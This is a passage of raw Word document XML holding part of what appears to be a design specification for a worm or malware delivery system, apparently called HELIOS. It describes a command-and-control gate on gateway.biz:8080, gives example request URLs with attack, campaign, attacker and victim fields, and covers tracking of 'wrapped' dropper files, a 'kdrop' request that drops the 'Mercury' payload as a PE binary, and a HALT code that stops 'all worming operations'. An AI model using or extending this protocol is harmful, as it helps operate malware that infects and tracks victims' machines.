        <w:t xml:space="preserve"> vector, is generally pulled from the gate. If there is a successful attack against a machine, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will send an information URL to the gate, to allow for generation tracking. This URL will contain the hostname of the attacker, and the hostname of the victim. So once the victim executes the payload, Mercury, a request will be made to authenticate to the gates, using the supplied hostname. If there is a mismatch, the host is banned from the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Here is an example tracking URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://gateway.biz:8080/gate.php?&amp;a=666&amp;w=777&amp;f=trak&amp;id=hostname&amp;rid=hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="8388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRPr="00957528" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRPr="00957528" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FUNCTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"w"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"f"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the function, '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>trak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>', to inform the gate of a tracking request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D26817" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"rid"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The remote hostname of the victim machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A70A1" w:rsidRDefault="000A70A1" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc347394101"/>
      <w:r>
        <w:t>Wrapper Tracking</w:t>
      </w:r>
      <w:r w:rsidR="00551FAB">
        <w:t xml:space="preserve"> [4]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="000A70A1" w:rsidRDefault="000A70A1" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A70A1" w:rsidRDefault="000A70A1" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Once a template is used to generate a "wrapped" file, a means of tracking the generation of each file becomes necessary. Each Wrapped file contains the gate list, allowing for tracking and downloading.</w:t>
      </w:r>
      <w:r w:rsidR="00777DCC">
        <w:t xml:space="preserve"> Here is a sample of the tracking request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://gateway.biz:8080/gate.php?&amp;a=666&amp;w=777&amp;f=wtrak&amp;id=hostname&amp;gid=hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="8388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRPr="00957528" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRPr="00957528" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FUNCTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"w"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>"f"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the function, '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wtrak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>', to track the Wrapper generations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the client machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the machine that generated the file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Note that the wrapper first makes the Tracking request, before proceeding onto the Payload request. This is to ensure that the downloader has properly registered with the gate, before dropping the Mercury payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc347394102"/>
      <w:r>
        <w:t>Wrapper Payload (Mercury)</w:t>
      </w:r>
      <w:r w:rsidR="00551FAB">
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Once the Wrapped file has been executed, the downloader will attempt to drop the Mercury payload onto the system. A gate list, specified by the Wrapper Template Generator, is used to determine which server contains the payload. Note that the gate list for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the gate list for the Wrapper USB may differ. Here is a sample URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://gateway.biz:8080/gate.php?&amp;a=666&amp;w=777&amp;f=kdrop&amp;id=hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="8388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRPr="00957528" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRPr="00957528" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FUNCTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"w"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"f"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the function, '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kdrop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' , to drop the Mercury payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00777DCC" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the client machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00777DCC" w:rsidRDefault="00777DCC" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00023738" w:rsidRDefault="00023738" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc347394103"/>
      <w:r>
        <w:t>Return Codes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
      <w:r>
        <w:tab/>
        <w:t>Requests for payloads must return only a binary, with a proper PE signature. Otherwise, any of the following return codes may be received:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2178"/>
        <w:gridCol w:w="7398"/>
      </w:tblGrid>
      <w:tr w:rsidR="00286BEB" w:rsidTr="00286BEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRPr="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Return Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7398" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRPr="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286BEB" w:rsidTr="00286BEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>TRACKOK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7398" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>Standard return code from a tracker request [4], [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286BEB" w:rsidTr="00286BEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>TEMPLATEOK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7398" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>When a Wrapper template is requested, if no new file is to be downloaded, then this return code is to be issued [2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286BEB" w:rsidTr="00286BEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>PAYLOADOK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7398" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t xml:space="preserve">When </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nTM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> attempts an update for the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nTM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> payload [1], either an updated PE will be returned, or the PAYLOADOK message, stating that the payload is up to date.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00286BEB" w:rsidTr="00286BEB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>HALT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7398" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB">
            <w:r>
              <w:t>Stop all worming operations. This message works for all requests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00286BEB" w:rsidRPr="00286BEB" w:rsidRDefault="00286BEB" w:rsidP="00286BEB"/>
    <w:sectPr w:rsidR="00286BEB" w:rsidRPr="00286BEB" w:rsidSect="007E64B7">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D01" w:rsidRDefault="00917D01" w:rsidP="0065380F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00917D01" w:rsidRDefault="00917D01" w:rsidP="00653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D01" w:rsidRDefault="00917D01" w:rsidP="0065380F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00917D01" w:rsidRDefault="00917D01" w:rsidP="006538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CC5922">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CC5922" w:rsidRDefault="00CC5922">
              <w:pPr>
                <w:pStyle w:val="Header"/>
                <w:jc w:val="right"/>
              </w:pPr>
              <w:r>
                <w:t>KERES GROUP</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CC5922" w:rsidRDefault="00CC5922" w:rsidP="001E73AA">
              <w:pPr>
                <w:pStyle w:val="Header"/>
                <w:jc w:val="right"/>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t xml:space="preserve">HELIOS </w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1152" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="000000" w:themeColor="text1"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC1DF7">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:rPr>
              <w:b/>
            </w:rPr>
          </w:pPr>
          <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
